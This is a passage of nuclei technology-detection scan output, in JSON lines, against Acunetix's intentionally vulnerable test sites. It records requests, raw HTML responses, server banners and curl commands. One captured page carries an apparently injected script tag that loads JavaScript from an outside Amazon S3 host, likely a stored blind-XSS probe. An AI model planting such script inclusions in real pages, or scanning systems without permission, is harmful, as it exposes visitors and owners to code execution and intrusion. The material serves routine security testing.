and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.871546549Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.878127673Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"ms-iis\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:33 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.906532877Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angularjs\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:37 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript 